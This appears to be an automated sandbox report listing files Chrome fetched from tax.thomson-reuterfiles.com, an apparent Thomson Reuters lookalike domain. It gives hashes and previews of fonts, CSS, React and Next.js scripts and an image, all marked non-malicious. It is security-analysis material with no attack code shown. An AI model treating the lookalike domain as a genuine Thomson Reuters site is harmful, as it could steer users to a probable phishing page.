                  Preview:/* cyrillic-ext */.@font-face {. font-family: 'Source Sans 3';. font-style: italic;. font-weight: 200 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/sourcesans3/v18/nwpMtKy2OAdR1K-IwhWudF-R3woqauLY1HY.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Source Sans 3';. font-style: italic;. font-weight: 200 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/sourcesans3/v18/nwpMtKy2OAdR1K-IwhWudF-R3woqY-LY1HY.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Source Sans 3';. font-style: italic;. font-weight: 200 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/sourcesans3/v18/nwpMtKy2OAdR1K-IwhWudF-R3woqa-LY1HY.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Source Sans 3';. font-styl
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65202)
                  Category:downloaded
                  Size (bytes):141047
                  Entropy (8bit):5.3354666088633245
                  Encrypted:false
                  SSDEEP:
                  MD5:71351D23ECDBFB39CB548F7CB628ECF9
                  SHA1:12811C1FC35D5864974BC4B98A641C037B56B9FC
                  SHA-256:1CD1CCA3AEBCDD10C33D713A95479909354DDBC5D5AD9761466AC27EA528895D
                  SHA-512:7016A1D5DA3B69C5002CB7079CEC48D4A7AB41A3C9DC2EA29D1EA3F236B7DAD83F4380AFFC75C2772D157327F94F6A0F41723B85F5031FF6EB732AD052B279B7
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/framework-0c7baedefba6b077.js
                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[774],{4448:function(n,t,a){/**. * @license React. * react-dom.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */var u,i,o,s,w,x,C=a(7294),_=a(3840);function p(n){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+n,a=1;a<arguments.length;a++)t+="&args[]="+encodeURIComponent(arguments[a]);return"Minified React error #"+n+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var N=new Set,z={};function fa(n,t){ha(n,t),ha(n+"Capture",t)}function ha(n,t){for(z[n]=t,n=0;n<t.length;n++)N.add(t[n])}var P=!("undefined"==typeof window||void 0===window.document||void 0===window.document.createElement),j=Object.prototype.hasOwnProperty,U=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with no line terminators
                  Category:downloaded
                  Size (bytes):16
                  Entropy (8bit):3.875
                  Encrypted:false
                  SSDEEP:
                  MD5:46DF3E5E2D15256CA16616EBFDA5427F
                  SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                  SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                  SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                  Malicious:false
                  Reputation:unknown
                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC44ORIZCYl_7RMjcnElEgUNkWGVTiHxs0hN1qpbJw==?alt=proto
                  Preview:CgkKBw2RYZVOGgA=
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 3020 x 388, 8-bit/color RGBA, non-interlaced
                  Category:downloaded
                  Size (bytes):135160
                  Entropy (8bit):7.959503731592724
                  Encrypted:false
                  SSDEEP:
                  MD5:8626685AEF425B8F971E7FDB64FACF98
                  SHA1:2F4042AFD5312BCE15757730870ED4ED7ED86F31
                  SHA-256:0467919FBAE3F5AB1B3109BBC941916142A7C68FE16823795F6CB13BC7E936A5
                  SHA-512:E565B4F94019C358610645EC826844A1498F03AD2A86BA962C26847BCCC3A0E1490F21F7ECE24E19E7E26DF4FE64A2E0AFDCE3121E7548080545D61B1E1F7031
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/media/search-background-desktop.a9bd8cdc.png
                  Preview:.PNG........IHDR.............Y.H.....pHYs...%...%.IR$.....sRGB.........gAMA......a.....IDATx.......5....?.=.w.]......MHx}.Y............B.!..B.!..B.y@.......!.......F}.z.i.;.f9.1...[zGr.;].........ai....j....A......c.DC.)..6....N2..$...J..G..^|u.mV=JAl....d.z....~....]n..a..3....hU...('.f.!...}.I.*.k.`..B.!..B.!..B.a.5...S(.b.:P0_n.6.7.N..CW.r.*9T.Tv.B.f.j.&1.....8.D....X._..Y..Ckc4.. ..W....Q.S.Z..0....>....,S...#If.lH.......S.F.|[N..5...V.`.b.....s}x:n.....N.<!..B....Q.....1.6d..RF.....B.!$.w....6..d.M.YI..Og`...=..|..G...Y...\J.}..3...Q{kk6....+^......M...Pt..O?H.~.1.e}.&.ZeBh...<1.F.....r.9...../%%......-.e..^.mws6..44..s|r..O.M..>.....|.,.|I......u.(......ynl....p..EON...."...x....Du..=W.N^+..#..}y..z..l.T....c..S'{..T0...;.f.....1|...yB.!..2....Y~......s....on..y.fy...........K.............`..K.D.+.."..uq...E:dD..v...\.n.~...B.!.-.P.fL.x.y..W....?.;.....QI...nl...rm.....W...*.89=.).t...W.W..<.T.t^.Z..ui.,.*r..!jX@.S*.....q.M.Q..j
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (29860)
                  Category:downloaded
                  Size (bytes):30040
                  Entropy (8bit):5.166885302002284
                  Encrypted:false
                  SSDEEP:
                  MD5:31DE4512A833E5551978867D98FF011C
                  SHA1:CD7032688634A063ED7AF8B36400C61D575742EB
                  SHA-256:B2EDCCC182DDAC5009DB3D04D352201D7833006B9EAE33F5E8ECAFB6FC976FDB
                  SHA-512:7614EC6B5C309E62ED66AB621142E6A8566D8D3B8C8298E5C4E05CD41A272A9715E3E06631CD5047112B85F99F01646902365C3A70EA16202766A72B4BE69AC7
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/css/6c5712a607796dcd.css
                  Preview:@import url("https://fonts.googleapis.com/css2?family=Source+Sans+3:ital,wght@0,200..900;1,200..900&display=swap");./*.! tailwindcss v3.3.2 | MIT License | https://tailwindcss.com.*/*,:after,:before{box-sizing:border-box;border:0 solid #e5e7eb}:after,:before{--tw-content:""}html{line-height:1.5;-webkit-text-size-adjust:100%;-moz-tab-size:4;-o-tab-size:4;tab-size:4;font-family:ui-sans-serif,system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;font-feature-settings:normal;font-variation-settings:normal}body{margin:0;line-height:inherit}hr{height:0;color:inherit;border-top-width:1px}abbr:where([title]){-webkit-text-decoration:underline dotted;text-decoration:underline dotted}h1,h2,h3,h4,h5,h6{font-size:inherit;font-weight:inherit}a{color:inherit;text-decoration:inherit}b,strong{font-weight:bolder}code,kbd,pre,samp{font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,L
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), TrueType, length 39304, version 1.0
                  Category:downloaded
                  Size (bytes):39304
                  Entropy (8bit):7.994120188451945
                  Encrypted:true
                  SSDEEP:
                  MD5:20DCA63D8EE3254B712C7171AE987713
                  SHA1:BFF49469BB0DC3989D8DD4726A85D060396B100F
                  SHA-256:CCAEE6F0BB7DCF2A0EE729096CFBA2CF24EA535E068F6CBFB827F79733F8181D
                  SHA-512:F1678F40E5DC86ACE717DCB33196D31BF2951C36E266419E61580313BEFBC44C049CFC86267A5156C20B561B3ED213807D44A96B8F57EB22E04BD2133CD7AE98
                  Malicious:false
                  Reputation:unknown
                  URL:https://app-data.gcs.trstatic.net/wel-trdotcom/fonts/all-characters/knowledge2017-medium-webfont.woff2
                  Preview:wOF2............................................?FFTM..*......8.`..^..4..u.....h..'.6.$..Z..p.. .."..T..*?webf.[._...q...A.m[...t..r..p.........nc.. ...F3....._.4d,siI[.." .#..o.o... H1!.....4.........6.p...P.i.x.=...4""".....P%,J&V.K..~].d...........F.....-B.g....K...g#.O..P.u02.j.d../",LhI.T..F.{.r..}......p..,..+".(..\....#.=.>d;s]..R,..;$...S. u....F.[ ..+D..l.T.9a.. "....7jS.mr...............l."............H...<...Lv.xGF...L....|.......\..~...s.mJ.no......-q.Vy...C7..y.Lnu.T;.%K...O..O...W..{fA ....l.FF.<..?.=..B,..'X.bc.....*L...r.".?.g..].....{..c.o..E..E.(..F.#R..T... .>.k....*...qe|...../~3s......F.%....%.Q .=.....}.E.P.LX...p..$.........<..}..k..N~.j+...J....b..@..i..5..@.......sf...$/x@.J.P....$.*.0.u.R......&.Y1..b....D.!.).jn..Pr...w..n.........?.T<.J(/.N.`!.....8.M.....$.#.X.<..]...66B..x..N....1*. \.L]..\....%7r.%.y..F...WI...%tr.r.T.yzA...8v....b.........TOy.3...I...+.j.jTK<. ...../G........t.N....n.5,....M.7..7W..e..L...7.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (54551)
                  Category:downloaded
                  Size (bytes):202199
                  Entropy (8bit):5.911594171548854
                  Encrypted:false
                  SSDEEP:
                  MD5:4CBBD1EB0EC89177917AD99F6C68F535
                  SHA1:DD9DF4DFDC929A5193122BBD1C9342CDF59F4FC5
                  SHA-256:BA7D803F2960371F9C72EAC0F1D2C9F2C874216C29470746545A6DB212BFD3CA
                  SHA-512:954EDBDEC7AD7AFA4F89E29C64C803C17F0D1F80122F15BC7B61574A908B0F4ADBD4C2FF8D871C5C8D371CDA5E0E2EDAB6BDA583ED0EC03717BAC476392B243F
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/_app-1e66c022522ffc96.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[888],{5687:function(m,R,H){"use strict";function invariant(m,R,H){if(void 0===H&&(H=Error),!m)throw new H(R)}H.d(R,{kG:function(){return invariant}})},5957:function(m,R,H){"use strict";function memoize(m,R){var H=R&&R.cache?R.cache:B,F=R&&R.serializer?R.serializer:serializerDefault;return(R&&R.strategy?R.strategy:function(m,R){var H,B,F=1===m.length?monadic:variadic;return H=R.cache.create(),B=R.serializer,F.bind(this,m,H,B)})(m,{cache:H,serializer:F})}function monadic(m,R,H,B){var F=null==B||"number"==typeof B||"boolean"==typeof B?B:H(B),U=R.get(F);return void 0===U&&(U=m.call(this,B),R.set(F,U)),U}function variadic(m,R,H){var B=Array.prototype.slice.call(arguments,3),F=H(B),U=R.get(F);return void 0===U&&(U=m.apply(this,B),R.set(F,U)),U}H.d(R,{A:function(){return F},H:function(){return memoize}});var serializerDefault=function(){return JSON.stringify(arguments)};function ObjectWithoutPrototypeCache(){this.cache=Object.create(nul
                  No static file info